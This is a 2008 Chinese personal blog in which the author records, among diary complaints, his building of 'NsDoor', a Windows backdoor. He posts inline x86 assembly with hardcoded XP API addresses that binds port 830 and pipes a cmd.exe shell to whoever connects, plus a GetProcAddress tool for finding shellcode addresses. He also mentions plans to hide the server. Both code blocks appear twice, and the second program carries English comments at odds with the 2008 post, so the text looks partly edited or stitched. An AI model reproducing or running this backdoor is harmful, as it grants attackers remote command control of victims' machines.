循环渐进NsDoor(小结)
今天好累啊
发表于:2008年8月14日 21时42分14秒来源:阅读(6)评论(0) 举报本文链接:http://user.qzone.qq.com/381002948/blog/1218721334
今天好累啊
今天超不爽,加上昨天都花了两天测试代码了,结果管道通信还是有问题,日啊,网上的代码都是错的,还都错在管道通信上,大家都擅长搞伪科学... 眼好酸,今天懒得更了...
明天再搞不来我就闭关....
今天在OUKU网购了6122C,希望收获个愉快...heihei
想回学校了...
下个学期我要做好学生,啊哈哈
千辛万苦
发表于:2008年8月20日 16时29分17秒来源:阅读(4)评论(0) 举报本文链接:http://user.qzone.qq.com/381002948/blog/1219220957
千辛万苦
push ebp; sub esp, 80;
mov ebp,esp;
装虚拟机费了我一天半的时间,最终通过代理可以上网,但是城市热点DR.COM是防代理的,我回学校还得重新想办法,虚拟机打开后再远程管理,速度很不错的说
同时开两个VS05调试都不卡
今天跟代码跟的头疼,再也不写了...
汇编或多或少有问题,本来就不太懂汇编,然后写代码时无法给ebp找到正确的地址,头疼
现在代码可以运行,但是得不到正确的结果,也就是后门可以使用,随便贴些 代码,明天继续修改
#include<winsock2.h>
#pragma comment(lib,"Ws2_32")
int main()
{
__asm
{
push ebp;
sub esp, 80;
mov ebp,esp;
}
/* mov eax,0x7C81D827
mov [ebp+4], eax; CreatePipe
mov eax,0x7C80236B
mov [ebp+8], eax; CreateProcessA
mov eax,0x7C860817
mov [ebp+12], eax; PeekNamedPipe
mov eax,0x7C810E17
mov [ebp+16], eax; WriteFile
mov eax,0x7C801812
mov [ebp+20], eax; ReadFile
mov eax,0x7C81CAFA
mov [ebp+24], eax; ExitProcess
mov eax,0x71A26A55
mov [ebp+28], eax; WSAStartup
mov eax,0x71A24211
mov [ebp+32], eax; socket
mov eax,0x71A24480
mov [ebp+36], eax; bind
mov eax,0x71A28CD3
mov [ebp+40], eax; listen
mov eax,0x71A31040
mov [ebp+44], eax; accept
mov eax,0x71A24C27
mov [ebp+48], eax; send
mov eax,0x71A2676F
mov [ebp+52], eax; recv
mov eax,0x0
mov [ebp+56],0
mov [ebp+60],0
mov [ebp+64],0
mov [ebp+68],0
mov [ebp+72],0
}*/
//WSADATA ws;
//WSAStartup(0x202,&ws);
_asm
{
LWSAStartup:
; WSAStartup(0x202, DATA)
add esp,168
push esp
push 0x202
mov eax,0x71A26A55
call eax
}
_asm
{
socket:
;socket(2,1,6)
push 6
push 1
push 2
mov eax,0x71A24211
call eax
mov ebx, eax ; save socket to ebx
LBind:
;bind(listenFD,(sockaddr *)&server,sizeof(server));
xor edi,edi
push edi
push 0x0012
mov eax,0x00150000
push eax ; port 830 AF_INET
mov esi, esp
push 0x10 ; length
push esi ; &server
push ebx ; socket
mov eax,0x71A24480
call eax; bind
LListen:
;listen(listenFD,2)
inc edi
inc edi
push edi ;2
push ebx ;socket
mov eax,0x71A28CD3
call eax;listen
LAccept:
;accept(listenFD,(sockaddr *)&server,&iAddrSize)
push 0x10
lea edi,[esp]
push edi
push esi ;&server
push ebx ;socket
mov eax,0x71A31040
call eax ;accept
mov ebx, eax ;save newsocket to ebx
Createpipe1:
;CreatePipe(&hReadPipe1,&hWritePipe1,&pipeattr1,0);
xor edi,edi
inc edi
push edi
xor edi,edi
push edi
push 0xc ;pipeattr
mov esi, esp
push edi ;0
push esi ;pipeattr1
lea eax, [ebp+60] ;&hWritePipe1
push eax
lea eax, [ebp+56] ;&hReadPipe1
push eax
mov eax,0x7C81D827
call eax
CreatePipe2:
;CreatePipe(&hReadPipe2,&hWritePipe2,&pipeattr2,0);
push edi ;0
push esi ;pipeattr2
lea eax,[ebp+68] ;hWritePipe2
push eax
lea eax, [ebp+64] ;hReadPipe2
push eax
mov eax,0x7C81D827
call eax
CreateProcess:
/*;ZeroMemory TARTUPINFO,10h PROCESS_INFORMATION 44h
sub esp, 0x80
lea edi, [esp]
xor eax, eax
push 0x80
pop ecx
rep stosd //清空s?弞, 鮂F鮂F?? i*/
;si.dwFlags
lea edi,[esp]
mov eax, 0x0101
mov [edi+2ch], eax;
;si.hStdInput = hReadPipe2 ebp+64
mov eax,[ebp+64]
mov [edi+38h],eax
;si.hStdOutput si.hStdError = hWritePipe1 ebp+60
mov eax,[ebp+60]
mov [edi+3ch],eax
mov eax,[ebp+60]
mov [edi+40h],eax
;cmd.exe
mov eax, 0x00646d63
mov [edi+64h],eax ;cmd
;CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation)
lea eax, [esp+44h]
push eax ;&pi
push edi ;&si
push ecx ;0
push ecx ;0
push ecx ;0
inc ecx
push ecx ;1
dec ecx
push ecx ;0
push ecx ;0
lea eax,[edi+64h] ;"cmd"
push eax
push ecx ;0
mov eax,0x7C80236B
call eax
loop1:
;while1
;PeekNamedPipe(hReadPipe1,Buff,1024,&lBytesRead,0,0);
sub esp,400h ;
mov esi,esp ;esi = Buff
xor ecx, ecx
push ecx ;0
push ecx ;0
lea edi,[ebp+72] ;&lBytesRead
push edi
mov eax,400h
push eax ;1024
push esi ;Buff
mov eax,[ebp+56]
push eax ;hReadPipe1
mov eax,0x7C801812
call eax
mov eax,[edi]
test eax,eax
jz recv_command
send_result:
;ReadFile(hReadPipe1,Buff,lBytesRead,&lBytesRead,0)
xor ecx,ecx
push ecx ;0
push edi ;&lBytesRead
push [edi] ;hReadPipe1
push esi ;Buff
push [ebp+56] ;hReadPipe1
mov eax,0x7C801812
call eax
;send(clientFD,Buff,lBytesRead,0)
xor ecx,ecx
push ecx ;0
push [edi] ;lBytesRead
push esi ;Buff
push ebx ;clientFD
call [ebp+48]
jmp loop1
recv_command:
;recv(clientFD,Buff,1024,0)
xor ecx,ecx
push ecx
mov eax,400h
push eax
push esi
push ebx
mov eax,0x71A2676F
call eax
//lea ecx,[edi]
mov [edi],eax
;WriteFile(hWritePipe2,Buff,lBytesRead,&lBytesRead,0)
xor ecx,ecx
push ecx
push edi
push [edi]
push esi
push [ebp+68]
mov eax,0x7C810E17
call eax
jmp loop1
end:
#pragma comment(lib,"Ws2_32")
int main()
{
__asm
{
push ebp;
sub esp, 80;
mov ebp,esp;
}
/* mov eax,0x7C81D827
mov [ebp+4], eax; CreatePipe
mov eax,0x7C80236B
mov [ebp+8], eax; CreateProcessA
mov eax,0x7C860817
mov [ebp+12], eax; PeekNamedPipe
mov eax,0x7C810E17
mov [ebp+16], eax; WriteFile
mov eax,0x7C801812
mov [ebp+20], eax; ReadFile
mov eax,0x7C81CAFA
mov [ebp+24], eax; ExitProcess
mov eax,0x71A26A55
mov [ebp+28], eax; WSAStartup
mov eax,0x71A24211
mov [ebp+32], eax; socket
mov eax,0x71A24480
mov [ebp+36], eax; bind
mov eax,0x71A28CD3
mov [ebp+40], eax; listen
mov eax,0x71A31040
mov [ebp+44], eax; accept
mov eax,0x71A24C27
mov [ebp+48], eax; send
mov eax,0x71A2676F
mov [ebp+52], eax; recv
mov eax,0x0
mov [ebp+56],0
mov [ebp+60],0
mov [ebp+64],0
mov [ebp+68],0
mov [ebp+72],0
}*/
//WSADATA ws;
//WSAStartup(0x202,&ws);
_asm
{
LWSAStartup:
; WSAStartup(0x202, DATA)
add esp,168
push esp
push 0x202
mov eax,0x71A26A55
call eax
}
_asm
{
socket:
;socket(2,1,6)
push 6
push 1
push 2
mov eax,0x71A24211
call eax
mov ebx, eax ; save socket to ebx
LBind:
;bind(listenFD,(sockaddr *)&server,sizeof(server));
xor edi,edi
push edi
push 0x0012
mov eax,0x00150000
push eax ; port 830 AF_INET
mov esi, esp
push 0x10 ; length
push esi ; &server
push ebx ; socket
mov eax,0x71A24480
call eax; bind
LListen:
;listen(listenFD,2)
inc edi
inc edi
push edi ;2
push ebx ;socket
mov eax,0x71A28CD3
call eax;listen
LAccept:
;accept(listenFD,(sockaddr *)&server,&iAddrSize)
push 0x10
lea edi,[esp]
push edi
push esi ;&server
push ebx ;socket
mov eax,0x71A31040
call eax ;accept
mov ebx, eax ;save newsocket to ebx
Createpipe1:
;CreatePipe(&hReadPipe1,&hWritePipe1,&pipeattr1,0);
xor edi,edi
inc edi
push edi
xor edi,edi
push edi
push 0xc ;pipeattr
mov esi, esp
push edi ;0
push esi ;pipeattr1
lea eax, [ebp+60] ;&hWritePipe1
push eax
lea eax, [ebp+56] ;&hReadPipe1
push eax
mov eax,0x7C81D827
call eax
CreatePipe2:
;CreatePipe(&hReadPipe2,&hWritePipe2,&pipeattr2,0);
push edi ;0
push esi ;pipeattr2
lea eax,[ebp+68] ;hWritePipe2
push eax
lea eax, [ebp+64] ;hReadPipe2
push eax
mov eax,0x7C81D827
call eax
CreateProcess:
/*;ZeroMemory TARTUPINFO,10h PROCESS_INFORMATION 44h
sub esp, 0x80
lea edi, [esp]
xor eax, eax
push 0x80
pop ecx
rep stosd //清空s?弞, 鮂F鮂F?? i*/
;si.dwFlags
lea edi,[esp]
mov eax, 0x0101
mov [edi+2ch], eax;
;si.hStdInput = hReadPipe2 ebp+64
mov eax,[ebp+64]
mov [edi+38h],eax
;si.hStdOutput si.hStdError = hWritePipe1 ebp+60
mov eax,[ebp+60]
mov [edi+3ch],eax
mov eax,[ebp+60]
mov [edi+40h],eax
;cmd.exe
mov eax, 0x00646d63
mov [edi+64h],eax ;cmd
;CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation)
lea eax, [esp+44h]
push eax ;&pi
push edi ;&si
push ecx ;0
push ecx ;0
push ecx ;0
inc ecx
push ecx ;1
dec ecx
push ecx ;0
push ecx ;0
lea eax,[edi+64h] ;"cmd"
push eax
push ecx ;0
mov eax,0x7C80236B
call eax
loop1:
;while1
;PeekNamedPipe(hReadPipe1,Buff,1024,&lBytesRead,0,0);
sub esp,400h ;
mov esi,esp ;esi = Buff
xor ecx, ecx
push ecx ;0
push ecx ;0
lea edi,[ebp+72] ;&lBytesRead
push edi
mov eax,400h
push eax ;1024
push esi ;Buff
mov eax,[ebp+56]
push eax ;hReadPipe1
mov eax,0x7C801812
call eax
mov eax,[edi]
test eax,eax
jz recv_command
send_result:
;ReadFile(hReadPipe1,Buff,lBytesRead,&lBytesRead,0)
xor ecx,ecx
push ecx ;0
push edi ;&lBytesRead
push [edi] ;hReadPipe1
push esi ;Buff
push [ebp+56] ;hReadPipe1
mov eax,0x7C801812
call eax
;send(clientFD,Buff,lBytesRead,0)
xor ecx,ecx
push ecx ;0
push [edi] ;lBytesRead
push esi ;Buff
push ebx ;clientFD
call [ebp+48]
jmp loop1
recv_command:
;recv(clientFD,Buff,1024,0)
xor ecx,ecx
push ecx
mov eax,400h
push eax
push esi
push ebx
mov eax,0x71A2676F
call eax
//lea ecx,[edi]
mov [edi],eax
;WriteFile(hWritePipe2,Buff,lBytesRead,&lBytesRead,0)
xor ecx,ecx
push ecx
push edi
push [edi]
push esi
push [ebp+68]
mov eax,0x7C810E17
call eax
jmp loop1
end:
休息一下
发表于:2008年8月18日 21时40分22秒来源:阅读(7)评论(0) 举报本文链接:http://user.qzone.qq.com/381002948/blog/1219066822
休息一下
这两天貌似很忙很累 我的6122c来了....
而且vista越来越讨厌,根本不适合写程序...
跟内存很费时...
我好累
dep好烦
随便贴点代码:
//address.cpp
#include<windows.h>
#include<cstring>
#include<iostream>
using namespace std;
typedef void (*MYPROC)(LPWSTR);
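// Prints `prompt`, then reads one whitespace-delimited token into `buf`.
// The extraction width is capped at the array size so over-long input is
// truncated instead of overrunning the buffer (the original `cin >> adrStr`
// had no bound). Returns false when the stream hits EOF or fails, so callers
// can stop instead of spinning on a dead stream.
template<std::size_t N>
static bool readToken(const char* prompt, char (&buf)[N])
{
    cout << prompt;
    cin.width(N);                       // width is reset after every >>, so set it each time
    return static_cast<bool>(cin >> buf);
}

// Interactive lookup tool: loads a DLL by name and resolves exported
// function addresses with GetProcAddress until "exit" is typed at the
// function prompt. Note that LoadLibraryA runs the module's DllMain, so
// only point it at DLLs that are trusted on this machine.
int main()
{
    char adrStr[200];
    HINSTANCE LibHandle;
    MYPROC ProcAdd;
    cout << " Function Address Hunter " << endl;
    while (readToken("The Dll name:", adrStr))
    {
        LibHandle = LoadLibraryA(adrStr);
        cout << LibHandle << endl << endl;
        if (!LibHandle)
        {
            // Every GetProcAddress on a null module fails; ask for another DLL instead.
            cout << "LoadLibraryA failed" << endl;
            continue;
        }
        while (readToken("Function Name:", adrStr) && strncmp(adrStr, "exit", 4) != 0)
        {
            ProcAdd = (MYPROC)GetProcAddress(LibHandle, adrStr);
            // A function pointer has no operator<< of its own and would be streamed
            // through its bool conversion (printing "1"); cast to void* to show the address.
            cout << (void*)ProcAdd << endl;
        }
        if (!cin)
            break;                      // EOF inside the inner loop ends the session too
    }
    return 0;
}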
#include<iostream>
#include<windows.h>
using namespace std;
typedef void (*MYPROC)(LPWSTR);
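// Prints `prompt`, then reads one whitespace-delimited token into `buf`.
// The extraction width is capped at the array size so over-long input is
// truncated instead of overrunning the buffer (the original `cin >> adrStr`
// had no bound). Returns false when the stream hits EOF or fails, so callers
// can stop instead of spinning on a dead stream.
template<std::size_t N>
static bool readToken(const char* prompt, char (&buf)[N])
{
    cout << prompt;
    cin.width(N);                       // width is reset after every >>, so set it each time
    return static_cast<bool>(cin >> buf);
}

// Interactive lookup tool: loads a DLL by name and resolves exported
// function addresses with GetProcAddress until "exit" is typed at the
// function prompt. Note that LoadLibraryA runs the module's DllMain, so
// only point it at DLLs that are trusted on this machine.
int main()
{
    char adrStr[200];
    HINSTANCE LibHandle;
    MYPROC ProcAdd;
    cout << " Function Address Hunter " << endl;
    while (readToken("The Dll name:", adrStr))
    {
        LibHandle = LoadLibraryA(adrStr);
        cout << LibHandle << endl << endl;
        if (!LibHandle)
        {
            // Every GetProcAddress on a null module fails; ask for another DLL instead.
            cout << "LoadLibraryA failed" << endl;
            continue;
        }
        while (readToken("Function Name:", adrStr) && strncmp(adrStr, "exit", 4) != 0)
        {
            ProcAdd = (MYPROC)GetProcAddress(LibHandle, adrStr);
            // A function pointer has no operator<< of its own and would be streamed
            // through its bool conversion (printing "1"); cast to void* to show the address.
            cout << (void*)ProcAdd << endl;
        }
        if (!cin)
            break;                      // EOF inside the inner loop ends the session too
    }
    return 0;
}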
明天再说
上面是我写NsDoor的心情记录,感觉真的很累,过段时间再继续。。。。
我快要回重庆了,这么多天一直为了这个NsDoor付出了很多时间,很多精力,现在一debug就有恶心的感觉
NsDoor还有很多要改进的地方,例如客户端肯定要用MFC写出来,然后是动态生成服务端,服务端会加入许多的功能代码(这时候就不再是shellcode了)
服务端的一些隐藏方法,等等等
我现在想到的就不下十处,但是实在懒得动了,我要为开学做准备了,多出去耍下啦
可以肯定的是,这个东西我还会继续向下写,以后会逐步完善,我很喜欢信息安全方面的开发,所以我很喜欢这个东西
加油,新学期,加油!!!
---------------------by NewSketcher
Time: 080822 22:08